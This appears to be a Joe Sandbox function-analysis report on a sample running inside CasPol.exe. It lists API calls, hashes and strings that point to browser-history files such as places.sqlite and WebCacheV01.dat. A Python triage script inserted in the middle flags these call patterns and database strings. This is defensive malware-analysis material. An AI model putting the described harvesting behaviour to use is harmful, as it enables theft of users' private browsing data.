                                                                                                                                                                                    • LockResource.KERNEL32(00000000), ref: 004148EF
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000001D.00000002.547995628.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_29_2_400000_CasPol.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: Resource$FindLoadLockSizeof
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 3473537107-0
                                                                                                                                                                                    • Opcode ID: 6eac18842e5c85fe8f5858b83388748d76eef83a8f56414f10f835c55d74c1c4
                                                                                                                                                                                    • Instruction ID: 8a72e2f5d7590eb6bb033c3ed88c96ec9d5eb8bcd973c23d1c6560583cb0a60d
                                                                                                                                                                                    • Opcode Fuzzy Hash: 6eac18842e5c85fe8f5858b83388748d76eef83a8f56414f10f835c55d74c1c4
                                                                                                                                                                                    • Instruction Fuzzy Hash: 0101D2727402156B8B294FB6DD4999BBFAEFFC6391308803AF809D6331DA31C851C688
                                                                                                                                                                                    APIs
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000001D.00000002.547995628.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_29_2_400000_CasPol.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: ??3@
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 613200358-0
                                                                                                                                                                                    • Opcode ID: 51118905c2728d810469e0c59db0571482045495d4d228400e43909190034b47
                                                                                                                                                                                    • Instruction ID: aa45652f999bbb0892b85dcd7393972dd4dfe4e89c7b59a5f1a68188070d07e1
                                                                                                                                                                                    • Opcode Fuzzy Hash: 51118905c2728d810469e0c59db0571482045495d4d228400e43909190034b47
                                                                                                                                                                                    • Instruction Fuzzy Hash: 5EE08C60F0830052BA31EBBABD40E2723EC5E1AB4271A842FB905C3282CE2CC880C02D
                                                                                                                                                                                    APIs
                                                                                                                                                                                    Strings
                                                                                                                                                                                    • only a single result allowed for a SELECT that is part of an expression, xrefs: 0043AAD3
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000001D.00000002.547995628.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_29_2_400000_CasPol.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: memset
                                                                                                                                                                                    • String ID: only a single result allowed for a SELECT that is part of an expression
                                                                                                                                                                                    • API String ID: 2221118986-1725073988
                                                                                                                                                                                    • Opcode ID: f2ccd9f22684a9d505166f2bd917588c88a2d89474e41d8808a21707a3bb0a12
                                                                                                                                                                                    • Instruction ID: 0c5fbdb45af1b87466ede92b40025f4dfba1e1eb7e0419b48c64bc8603b8f36f
                                                                                                                                                                                    • Opcode Fuzzy Hash: f2ccd9f22684a9d505166f2bd917588c88a2d89474e41d8808a21707a3bb0a12
                                                                                                                                                                                    • Instruction Fuzzy Hash: 5D827A71608340AFD720DF15C881B1BBBE1FF88318F14491EFA9987262D779E954CB96
                                                                                                                                                                                    APIs
                                                                                                                                                                                      • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                                                                                                                                                                      • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(0045DE68,00000104,?,?,?), ref: 0040A841
                                                                                                                                                                                      • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                                                                                                                                                                      • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                                                                                                                                                                      • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(00000000), ref: 0040A87B
                                                                                                                                                                                      • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?), ref: 0040A884
                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,SHGetSpecialFolderPathW,00414C40,?,00000000), ref: 00414BA4
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000001D.00000002.547995628.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_29_2_400000_CasPol.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: LibraryLoad$AddressDirectoryProcSystemmemsetwcscatwcscpy
                                                                                                                                                                                    • String ID: SHGetSpecialFolderPathW$shell32.dll
                                                                                                                                                                                    • API String ID: 2773794195-880857682
                                                                                                                                                                                    • Opcode ID: 97e3436b7678629204c95b3b1f0e86467fe5b848d0a0c87f8b2ef990139e8914
                                                                                                                                                                                    • Instruction ID: 520684b8054713cb13715c6c8af1848dbb459e29e8538d47b3508bbaa4bbc045
                                                                                                                                                                                    • Opcode Fuzzy Hash: 97e3436b7678629204c95b3b1f0e86467fe5b848d0a0c87f8b2ef990139e8914
                                                                                                                                                                                    • Instruction Fuzzy Hash: 23D0C7719483019DD7105F65AC19B8336545B50307F204077AC04E66D7EA7CC4C49E1D
                                                                                                                                                                                    APIs
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000001D.00000002.547995628.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_29_2_400000_CasPol.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: ??2@
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 1033339047-0
                                                                                                                                                                                    • Opcode ID: bb5a2cedd882201272bd117211a6380788fbbee7b2a1ea69d9384cb42441e8af
                                                                                                                                                                                    • Instruction ID: 5f4fc1bc6a90e200713bb7744dd8ab6a017b0cf4e98027731d5581fdeff4b0c3
                                                                                                                                                                                    • Opcode Fuzzy Hash: bb5a2cedd882201272bd117211a6380788fbbee7b2a1ea69d9384cb42441e8af
                                                                                                                                                                                    • Instruction Fuzzy Hash: B00121B2A413005EEB7ADF38EE5772966A0AF4C351F01453EA246CD1F6EEF58480CB49
                                                                                                                                                                                    APIs
                                                                                                                                                                                      • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000,00000065,?), ref: 004449E7
                                                                                                                                                                                      • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 004449F8
                                                                                                                                                                                      • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A09
                                                                                                                                                                                      • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A1A
                                                                                                                                                                                      • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A2B
                                                                                                                                                                                      • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A3C
                                                                                                                                                                                      • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A4D
                                                                                                                                                                                    • memcmp.MSVCRT ref: 00444BA5
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000001D.00000002.547995628.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_29_2_400000_CasPol.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: AddressProc$memcmp
                                                                                                                                                                                    • String ID: $$8
                                                                                                                                                                                    • API String ID: 2808797137-435121686
                                                                                                                                                                                    • Opcode ID: e80885fdbb6a557c0c44277052daa68a3f3074bd67b4db13da85d3ecc8de475b
                                                                                                                                                                                    • Instruction ID: 2c4e4273d6b09173b98ec99ba1a72f96ebc6587eba5c15334d9e54441f883a66
                                                                                                                                                                                    • Opcode Fuzzy Hash: e80885fdbb6a557c0c44277052daa68a3f3074bd67b4db13da85d3ecc8de475b
                                                                                                                                                                                    • Instruction Fuzzy Hash: 04314171A00209ABEB10DFA6CDC1BAEB7B9FF88314F11055AE515A3241D778ED048B69
                                                                                                                                                                                    APIs
                                                                                                                                                                                      • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                                                                                                                                                                      • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(0045DE68,00000104,?,?,?), ref: 0040A841
                                                                                                                                                                                      • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                                                                                                                                                                      • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                                                                                                                                                                      • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(00000000), ref: 0040A87B
                                                                                                                                                                                      • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?), ref: 0040A884
                                                                                                                                                                                    • _mbscpy.MSVCRT(0045E298,00000000,00000155,?,00405340,?,00000000,004055B5,?,00000000,00405522,?,?,?,00000000,00000000), ref: 00405250
                                                                                                                                                                                    • _mbscat.MSVCRT ref: 0040525B
                                                                                                                                                                                    • GetProcAddress.KERNEL32(0045DBE0,0045E298,00000060,00000000), ref: 00405266
                                                                                                                                                                                      • Part of subcall function 00405211: GetProcAddress.KERNEL32(0045DBE0,?,00405282,00000000), ref: 00405217
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000001D.00000002.547995628.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_29_2_400000_CasPol.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: AddressLibraryLoadProc$DirectorySystem_mbscat_mbscpymemsetwcscatwcscpy
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 966727022-0
                                                                                                                                                                                    • Opcode ID: aa271fa985e038ed7aa7a673401608462c82e67ac2ecc87e69baa60a0a084fe3
                                                                                                                                                                                    • Instruction ID: 606e4c6bb64acde45ccb9f726b040251bc13cbada001f714d968da5dd22dddd0
                                                                                                                                                                                    • Opcode Fuzzy Hash: aa271fa985e038ed7aa7a673401608462c82e67ac2ecc87e69baa60a0a084fe3
                                                                                                                                                                                    • Instruction Fuzzy Hash: 52212171A80F00DADA10BF769C4BB1F2694DF50715B10046FB158FA2D2EBBC95419A9D
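The function-analysis blocks in this section are machine-generated and repetitive, so an analyst usually parses them rather than reading each one. The script below is an added example, not part of the Joe Sandbox report and not code from the analysed sample: it parses entries in the layout used on this page (APIs, Strings, Memory Dump Source, Joe Sandbox IDA Plugin, Similarity), collects the API calls including the "Part of subcall function" lines, and flags call combinations that appear in the entries above: the FindResourceW/SizeofResource/LoadResource/LockResource sequence, LoadLibraryW followed by GetProcAddress with a recorded symbol name (SHGetSpecialFolderPathW here), the CreateFileMappingW/MapViewOfFile/WriteFile/DeleteFileW sequence, and String IDs naming the WebCacheV01.dat database. The pattern table and its tag names are assumptions made for this illustration, not Joe Sandbox signatures, and the embedded sample text is constructed from entries on this page.

```python
"""Triage helper for Joe Sandbox function-analysis entries.

Added example; not part of the Joe Sandbox report and not code from the
analysed sample. PATTERNS and STRING_HINTS are assumptions for illustration.
"""
import re
from dataclasses import dataclass, field

# "• FindResourceW.KERNEL32(?,?,?), ref: 004148C3"
# "• Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824"
API_RE = re.compile(
    r"^•\s*(?:Part of subcall function (?P<sub>[0-9A-Fa-f]+):\s*)?"
    r"(?P<name>[\w?@]+)\.(?P<module>\w+)(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)$"
)
STRING_RE = re.compile(r"^•\s*(?P<text>.*?),\s*xrefs:\s*[0-9A-Fa-f]+$")  # Strings section
FIELD_RE = re.compile(r"^•\s*(?P<key>[A-Za-z ]+?):\s*(?P<val>.*)$")    # "• API ID: ..." etc.
SECTIONS = {"APIs", "Strings", "Memory Dump Source", "Joe Sandbox IDA Plugin", "Similarity"}

# Call combinations worth a first look (assumed for this example, not sandbox signatures).
PATTERNS = {
    "resource-load": {"FindResourceW", "SizeofResource", "LoadResource", "LockResource"},
    "dynamic-import": {"LoadLibraryW", "GetProcAddress"},
    "map-write-delete": {"CreateFileMappingW", "MapViewOfFile", "WriteFile", "DeleteFileW"},
}
STRING_HINTS = {"webcache-db": "WebCache"}  # WinINet browsing-history/cookie database

@dataclass
class Call:
    name: str
    module: str
    args: list
    ref: str
    subcall: str = ""  # callee address when the line is "Part of subcall function"

@dataclass
class FunctionEntry:
    calls: list = field(default_factory=list)
    strings: list = field(default_factory=list)
    fields: dict = field(default_factory=dict)

    def api_names(self):
        return {c.name for c in self.calls}

    def resolved_imports(self):
        """Symbol names the sandbox recorded as GetProcAddress arguments."""
        names = set()
        for c in self.calls:
            if c.name == "GetProcAddress":
                for a in c.args:
                    if re.fullmatch(r"[A-Za-z_]\w*", a) and not re.fullmatch(r"[0-9A-Fa-f]{8}", a):
                        names.add(a)
        return names

def parse_entries(text):
    entries, section, cur = [], None, None
    for raw in text.splitlines():
        line = raw.strip()
        if line in SECTIONS:
            if line == "APIs":  # every function block starts with its APIs list
                cur = FunctionEntry()
                entries.append(cur)
            section = line
        elif cur is not None and line:
            if section == "APIs" and (m := API_RE.match(line)):
                args = [a.strip() for a in (m.group("args") or "").split(",") if a.strip()]
                cur.calls.append(Call(m.group("name"), m.group("module"), args, m.group("ref"), m.group("sub") or ""))
            elif section == "Strings" and (m := STRING_RE.match(line)):
                cur.strings.append(m.group("text"))
            elif (m := FIELD_RE.match(line)):
                cur.fields[m.group("key").strip()] = m.group("val").strip()
    return entries

def triage(text):
    """Return one finding per entry that matches a pattern or string hint."""
    findings = []
    for i, e in enumerate(parse_entries(text)):
        tags = [t for t, apis in PATTERNS.items() if apis <= e.api_names()]
        tags += [t for t, needle in STRING_HINTS.items()
                 if needle in e.fields.get("String ID", "") or any(needle in s for s in e.strings)]
        if tags:
            findings.append({"entry": i, "tags": tags, "imports": sorted(e.resolved_imports()),
                             "instruction_id": e.fields.get("Instruction ID", "")[:16]})
    return findings

# Constructed from function-analysis entries on this page (three blocks, trimmed).
SAMPLE_REPORT = r"""
APIs
• FindResourceW.KERNEL32(?,?,?), ref: 004148C3
• SizeofResource.KERNEL32(?,00000000), ref: 004148D4
• LoadResource.KERNEL32(?,00000000), ref: 004148E4
• LockResource.KERNEL32(00000000), ref: 004148EF
Memory Dump Source
• Source File: 0000001D.00000002.547995628.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Similarity
• API ID: Resource$FindLoadLockSizeof
• Instruction ID: 8a72e2f5d7590eb6bb033c3ed88c96ec9d5eb8bcd973c23d1c6560583cb0a60d
APIs
  • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(0045DE68,00000104,?,?,?), ref: 0040A841
  • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(00000000), ref: 0040A87B
• GetProcAddress.KERNEL32(00000000,SHGetSpecialFolderPathW,00414C40,?,00000000), ref: 00414BA4
Similarity
• String ID: SHGetSpecialFolderPathW$shell32.dll
APIs
• memset.MSVCRT ref: 0040A824
Similarity
• String ID: Microsoft\Windows\WebCache\WebCacheV01.dat$Microsoft\Windows\WebCache\WebCacheV24.dat
"""

if __name__ == "__main__":
    for finding in triage(SAMPLE_REPORT):
        print(finding)
```

Run it against the text of a saved report and the findings point at the few entries worth opening in the disassembler first; the Instruction ID prefix in each finding is what ties a flagged block back to the report, since the sandbox does not print the function's own start address in these entries. Subcall lines are counted together with the function's direct calls on purpose: the dynamic-import case above only becomes visible when LoadLibraryW from the helper at 0040A804 is combined with the GetProcAddress call in the caller.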
                                                                                                                                                                                    APIs
    • Part of subcall function 0040E01E: OpenProcess.KERNEL32(00000040,00000000,00000000,00000104,?,00000000,00000104,?,00000000,00000104,00000000), ref: 0040E093
    • Part of subcall function 0040E01E: GetCurrentProcess.KERNEL32(?,80000000,00000000,00000000), ref: 0040E0B2
    • Part of subcall function 0040E01E: DuplicateHandle.KERNEL32(?,00000104,00000000), ref: 0040E0BF
    • Part of subcall function 0040E01E: GetFileSize.KERNEL32(?,00000000), ref: 0040E0D4
    • Part of subcall function 0040E01E: CreateFileMappingW.KERNELBASE(?,00000000,00000002,00000000,00000000,00000000), ref: 0040E0FE
    • Part of subcall function 0040E01E: MapViewOfFile.KERNELBASE(00000000,00000004,00000000,00000000,00000104), ref: 0040E113
    • Part of subcall function 0040E01E: WriteFile.KERNELBASE(00000000,00000000,00000104,0040E6A3,00000000), ref: 0040E12E
    • Part of subcall function 0040E01E: UnmapViewOfFile.KERNELBASE(00000000), ref: 0040E135
    • Part of subcall function 0040E01E: CloseHandle.KERNELBASE(?), ref: 0040E13E
  • CloseHandle.KERNELBASE(000000FF), ref: 0040E582
    • Part of subcall function 0040E2AB: memset.MSVCRT ref: 0040E380
    • Part of subcall function 0040E2AB: wcschr.MSVCRT ref: 0040E3B8
    • Part of subcall function 0040E2AB: memcpy.MSVCRT(?,-00000121,00000008,0044E518,00000000,00000000,756F13E0), ref: 0040E3EC
  • DeleteFileW.KERNELBASE(?,?,0040E6A3,000000FF,?,00000104,00000000), ref: 0040E5A3
  • CloseHandle.KERNEL32(000000FF), ref: 0040E5CA
    • Part of subcall function 0040E175: memset.MSVCRT ref: 0040E1BD
    • Part of subcall function 0040E175: _snwprintf.MSVCRT ref: 0040E257
    • Part of subcall function 0040E175: free.MSVCRT ref: 0040E28B
Memory Dump Source
  • Source File: 0000001D.00000002.547995628.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
  • Snapshot File: hcaresult_29_2_400000_CasPol.jbxd
Similarity
  • API ID: File$Handle$Close$ProcessViewmemset$CreateCurrentDeleteDuplicateMappingOpenSizeUnmapWrite_snwprintffreememcpywcschr
  • String ID:
  • API String ID: 1979745280-0
  • Opcode ID: 8c4b04af935ef543e183fc2d5fdeec50da417ae7152dfd79b37e36c3b45d6897
  • Instruction ID: 90d235a97b45fa8760f9e747b2c38a4e83ddeae1161d8ec943a7631d31c9d9e7
  • Opcode Fuzzy Hash: 8c4b04af935ef543e183fc2d5fdeec50da417ae7152dfd79b37e36c3b45d6897
  • Instruction Fuzzy Hash: DA312CB1C00618ABCF60DF96CD456CEF7B8AF44318F1006AB9518B31A1DB755E95CF58
APIs
    • Part of subcall function 00403BED: memset.MSVCRT ref: 00403C09
    • Part of subcall function 00403BED: memset.MSVCRT ref: 00403C1E
    • Part of subcall function 00403BED: wcscat.MSVCRT ref: 00403C47
    • Part of subcall function 00403BED: wcscat.MSVCRT ref: 00403C70
  • memset.MSVCRT ref: 00403A55
    • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
    • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
    • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
    • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
    • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,00445E12,?,?,?,00000104), ref: 00409B9C
    • Part of subcall function 0040A8D0: wcslen.MSVCRT ref: 0040A8E2
    • Part of subcall function 0040A8D0: free.MSVCRT ref: 0040A908
    • Part of subcall function 0040A8D0: free.MSVCRT ref: 0040A92B
    • Part of subcall function 0040A8D0: memcpy.MSVCRT(?,?,000000FF,00000000,?,?,00000000,?,0040320A,00000000,000000FF), ref: 0040A94F
Strings
Memory Dump Source
  • Source File: 0000001D.00000002.547995628.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
  • Snapshot File: hcaresult_29_2_400000_CasPol.jbxd
Similarity
  • API ID: memsetwcscatwcslen$free$AttributesFilememcpywcscpy
  • String ID: history.dat$places.sqlite
  • API String ID: 2641622041-467022611
  • Opcode ID: ff38290cf6d73649d3c52fc0ad95bc2cdf601f157f84f60878f9098853983ee3
  • Instruction ID: 4d52d99a2018a06e8b3479be55870673e402391ac5db5fe9af26a684ed702786
  • Opcode Fuzzy Hash: ff38290cf6d73649d3c52fc0ad95bc2cdf601f157f84f60878f9098853983ee3
  • Instruction Fuzzy Hash: CA112EB2A0111866DB10FA66CD4AACE77BCAF54354F1001B7B915B20C2EB3CAF45CA69
APIs
    • Part of subcall function 00417570: SetFilePointer.KERNELBASE(?,?,?,00000000), ref: 00417591
    • Part of subcall function 00417570: GetLastError.KERNEL32 ref: 004175A2
    • Part of subcall function 00417570: GetLastError.KERNEL32 ref: 004175A8
  • ReadFile.KERNELBASE(?,?,?,?,00000000), ref: 0041761D
  • GetLastError.KERNEL32 ref: 00417627
Memory Dump Source
  • Source File: 0000001D.00000002.547995628.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
  • Snapshot File: hcaresult_29_2_400000_CasPol.jbxd
Similarity
  • API ID: ErrorLast$File$PointerRead
  • String ID:
  • API String ID: 839530781-0
  • Opcode ID: 35ac1a26cfbf5729ffddcbfd3a0d39ca45c1cff254cac5b3720273d0b32ffa80
  • Instruction ID: c9208e3d43fc8ff2949f7201360c8f82def2114e122364bdeb0a9035ecfb973e
  • Opcode Fuzzy Hash: 35ac1a26cfbf5729ffddcbfd3a0d39ca45c1cff254cac5b3720273d0b32ffa80
  • Instruction Fuzzy Hash: D001A236208204BBEB008F69DC45BDA3B78FB153B4F100427F908C6640E275D89096EA
Strings
Memory Dump Source
  • Source File: 0000001D.00000002.547995628.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
  • Snapshot File: hcaresult_29_2_400000_CasPol.jbxd
Similarity
  • API ID: FileFindFirst
  • String ID: *.*$index.dat
  • API String ID: 1974802433-2863569691
  • Opcode ID: da4ae6558bc3f7d8c9357f2fa5faf2f590160579c2a5e59c58801196d12f8aed
  • Instruction ID: 5c3219b8572ff4376619b1de75d6d1d1b7443a793578eadcc31bed7d77429009
  • Opcode Fuzzy Hash: da4ae6558bc3f7d8c9357f2fa5faf2f590160579c2a5e59c58801196d12f8aed
  • Instruction Fuzzy Hash: 0E01257180125895EB20E761DC467DF766C9F04314F5002FB9818F21D6E7389F958F9A
APIs
  • SetFilePointer.KERNELBASE(?,?,?,00000000), ref: 00417591
  • GetLastError.KERNEL32 ref: 004175A2
  • GetLastError.KERNEL32 ref: 004175A8
Memory Dump Source
  • Source File: 0000001D.00000002.547995628.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
  • Snapshot File: hcaresult_29_2_400000_CasPol.jbxd
Similarity
  • API ID: ErrorLast$FilePointer
  • String ID:
  • API String ID: 1156039329-0
  • Opcode ID: cc1ef3dda130daf7e478d1b1942235eaeedb2679cbd5ead2c00b98c40fc327c6
  • Instruction ID: d6bca62a971eeae6b8c8b5ba9af71e52dcee60bc35e592f51b1cb5e4efccb3e3
  • Opcode Fuzzy Hash: cc1ef3dda130daf7e478d1b1942235eaeedb2679cbd5ead2c00b98c40fc327c6
  • Instruction Fuzzy Hash: 03F03071918115FBCB009B75DC009AA7ABAFB05360B104726E822D7690E730E9409AA8
APIs
  • CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,02000000,00000000), ref: 0040A044
  • GetFileTime.KERNEL32(00000000,00000000,00000000,?), ref: 0040A058
  • CloseHandle.KERNEL32(00000000), ref: 0040A061
Memory Dump Source
  • Source File: 0000001D.00000002.547995628.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
  • Snapshot File: hcaresult_29_2_400000_CasPol.jbxd
Similarity
  • API ID: File$CloseCreateHandleTime
  • String ID:
  • API String ID: 3397143404-0
  • Opcode ID: 6d8e9772f553e0f6d6fb1ff05c82d92c5ca35a40b5ea430072252ef77abff331
  • Instruction ID: 1a7e7c0172e67e076cb3c0c47f72e507911c66c01d2121fa3096849e88919459
  • Opcode Fuzzy Hash: 6d8e9772f553e0f6d6fb1ff05c82d92c5ca35a40b5ea430072252ef77abff331
  • Instruction Fuzzy Hash: 23E04F3624036077E2311B2BAC0CF4B2E69FBCBB21F150639F565B21E086704915C665
APIs
  • GetTempPathW.KERNEL32(00000104,?), ref: 00409A5C
  • GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 00409A6E
  • GetTempFileNameW.KERNELBASE(?,0040B827,00000000,?), ref: 00409A85
Memory Dump Source
  • Source File: 0000001D.00000002.547995628.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
  • Snapshot File: hcaresult_29_2_400000_CasPol.jbxd
Similarity
  • API ID: Temp$DirectoryFileNamePathWindows
  • String ID:
  • API String ID: 1125800050-0
  • Opcode ID: 18925d4506bf85468b003a70c2eb1ed6509d95f01bdd5ff44bce1f80956a42fa
  • Instruction ID: b144c37017a21c6b5a3d1d2b3cfc872714830df517851edcd0bc871ed666fd71
  • Opcode Fuzzy Hash: 18925d4506bf85468b003a70c2eb1ed6509d95f01bdd5ff44bce1f80956a42fa
  • Instruction Fuzzy Hash: ACE0927A500218A7DB109B61DC4DFC777BCFB45304F0001B1B945E2161EB349A848BA8
                                                                                                                                                                                    APIs
                                                                                                                                                                                    Strings
Memory Dump Source
• Source File: 0000001D.00000002.547995628.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_29_2_400000_CasPol.jbxd
Similarity
• API ID: CloseHandleSleep
• String ID: }A
• API String ID: 252777609-2138825249
APIs
• malloc.MSVCRT ref: 00409A10
• memcpy.MSVCRT(00000000,?,?,?,?,004027EB,00000004,?,?,?,00401F8F,00000000), ref: 00409A28
• free.MSVCRT ref: 00409A31
Similarity
• API ID: freemallocmemcpy
• String ID:
• API String ID: 3056473165-0
Similarity
• API ID: memset
• String ID: BINARY
• API String ID: 2221118986-907554435
Similarity
• API ID: _wcsicmp
• String ID: /stext
• API String ID: 2081463915-3817206916
APIs
  • Part of subcall function 004096C3: CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000000,00000000), ref: 004096D5
• GetFileSize.KERNEL32(00000000,00000000,00000143,00000000,00000000,00000000,?,00409690,00000000,00408801,?,?,00000143,?,?,00000143), ref: 00409552
• CloseHandle.KERNELBASE(00000000), ref: 0040957A
  • Part of subcall function 0040AFCF: ??2@YAPAXI@Z.MSVCRT ref: 0040AFD8
  • Part of subcall function 0040A2EF: ReadFile.KERNELBASE(00000000,00000000,004450DD,00000000,00000000), ref: 0040A306
Similarity
• API ID: File$??2@CloseCreateHandleReadSize
• String ID:
• API String ID: 1023896661-0
APIs
  • Part of subcall function 004096C3: CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000000,00000000), ref: 004096D5
• GetFileSize.KERNEL32(00000000,00000000,000003FF,?,00000000,0040B7D4,?,?,?,?,000003FF,?,?,?,00445FAE,?), ref: 0040CC44
  • Part of subcall function 0040AFCF: ??2@YAPAXI@Z.MSVCRT ref: 0040AFD8
  • Part of subcall function 0040A2EF: ReadFile.KERNELBASE(00000000,00000000,004450DD,00000000,00000000), ref: 0040A306
  • Part of subcall function 0040AB4A: MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,00000000,?,00000001,?,00401D51,00000000,00000001,00000000), ref: 0040AB63
  • Part of subcall function 0040AB4A: MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,00000000,?,00000001,?,00401D51,00000000,00000001,00000000), ref: 0040AB88
• CloseHandle.KERNELBASE(?), ref: 0040CC98
  • Part of subcall function 0040B04B: ??3@YAXPAX@Z.MSVCRT(00000000,00401B44,0044E518,?,00000001,00401B95,?,00401EE4), ref: 0040B052
Similarity
• API ID: File$ByteCharMultiWide$??2@??3@CloseCreateHandleReadSize
• String ID:
• API String ID: 2445788494-0
Similarity
• API ID: memcmpmemset
• String ID:
• API String ID: 1065087418-0
APIs
  • Part of subcall function 0040ECD8: ??2@YAPAXI@Z.MSVCRT ref: 0040ECF9
  • Part of subcall function 0040ECD8: ??3@YAXPAX@Z.MSVCRT(00000000), ref: 0040EDC0
• GetStdHandle.KERNEL32(000000F5), ref: 00410530
• CloseHandle.KERNEL32(?), ref: 00410654
  • Part of subcall function 004096DC: CreateFileW.KERNELBASE(00000001,40000000,00000001,00000000,00000002,00000000,00000000), ref: 004096EE
  • Part of subcall function 0040973C: GetLastError.KERNEL32 ref: 00409750
  • Part of subcall function 0040973C: _snwprintf.MSVCRT ref: 0040977D
  • Part of subcall function 0040973C: MessageBoxW.USER32(?,?,Error,00000030), ref: 00409796
Similarity
• API ID: Handle$??2@??3@CloseCreateErrorFileLastMessage_snwprintf
• String ID:
• API String ID: 1381354015-0
Similarity
• API ID: free
• String ID:
• API String ID: 1294909896-0
                                                                                                                                                                                    • Opcode ID: cbd9f9e03ce833727f217058398efad0a096bf54ba10072877aeedcd786ebb4c
                                                                                                                                                                                    • Instruction ID: 7f33cc2486ffea160e999b9abaf125df84647c5341351ad01334bd221cd3bada
                                                                                                                                                                                    • Opcode Fuzzy Hash: cbd9f9e03ce833727f217058398efad0a096bf54ba10072877aeedcd786ebb4c
